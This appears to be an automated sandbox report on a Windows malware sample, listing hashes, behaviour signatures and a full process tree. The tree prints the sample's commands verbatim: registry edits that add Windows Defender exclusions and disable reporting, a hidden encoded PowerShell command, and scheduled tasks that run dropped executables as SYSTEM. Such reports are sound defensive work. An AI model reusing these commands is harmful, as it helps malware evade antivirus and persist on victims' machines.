Analysis
-
max time kernel
140s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
24-11-2022 12:08
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
080767677c91ff72a19363f71a1d14a3
-
SHA1
c1ce95aba4f5ab985f439b5dc9890a40454cb61d
-
SHA256
848b74b49d5770fc1d119aeb76786f887ffa8316fde006b0162e1040f3ec3fbd
-
SHA512
0eecb34312884fbde607b1ef9d2dc0f85d978088184ed6f169114416ada1988205743556b84c0d1c9b472c1a5a3079e023b45fe247f8be3ea8118140d7555e97
-
SSDEEP
196608:91Oicf3Qv9bnMYarNLZQcxZg+Utyrfc8Z5:3OicY+YOQcxSnsU05
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 27 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 40 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSF707.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSFB2D.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gKfOwSDIp" /SC once /ST 06:00:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gKfOwSDIp"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gKfOwSDIp"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOiTQeSEdqGWpodAVP" /SC once /ST 12:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc\hZjsoBMRqZccvfN\bmvtpTB.exe\" qH /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc\hZjsoBMRqZccvfN\bmvtpTB.exeC:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc\hZjsoBMRqZccvfN\bmvtpTB.exe qH /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HSbxAtpKDhQU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HSbxAtpKDhQU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VwRFfGirhYNWC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VwRFfGirhYNWC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WcpDpTQRU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WcpDpTQRU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nsKOTpeyUVUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nsKOTpeyUVUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vONtrOkcmiWVHKGuTIR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vONtrOkcmiWVHKGuTIR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\rThwBnsAuYFVuyVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\rThwBnsAuYFVuyVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HQlSiZkrEcWzlGAW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HQlSiZkrEcWzlGAW\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HSbxAtpKDhQU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HSbxAtpKDhQU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HSbxAtpKDhQU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VwRFfGirhYNWC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VwRFfGirhYNWC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WcpDpTQRU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WcpDpTQRU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nsKOTpeyUVUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nsKOTpeyUVUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vONtrOkcmiWVHKGuTIR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vONtrOkcmiWVHKGuTIR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\rThwBnsAuYFVuyVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\rThwBnsAuYFVuyVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HQlSiZkrEcWzlGAW /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HQlSiZkrEcWzlGAW /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkVFsxIAF" /SC once /ST 11:08:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkVFsxIAF"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkVFsxIAF"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mWpvNhkreefCvMcFM" /SC once /ST 09:25:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HQlSiZkrEcWzlGAW\uBfWLVVXjViPVDU\cbRFWOg.exe\" aI /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "mWpvNhkreefCvMcFM"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\HQlSiZkrEcWzlGAW\uBfWLVVXjViPVDU\cbRFWOg.exeC:\Windows\Temp\HQlSiZkrEcWzlGAW\uBfWLVVXjViPVDU\cbRFWOg.exe aI /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bOiTQeSEdqGWpodAVP"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\WcpDpTQRU\GJQVQk.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "bRPkNtVzIKzIqGA" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
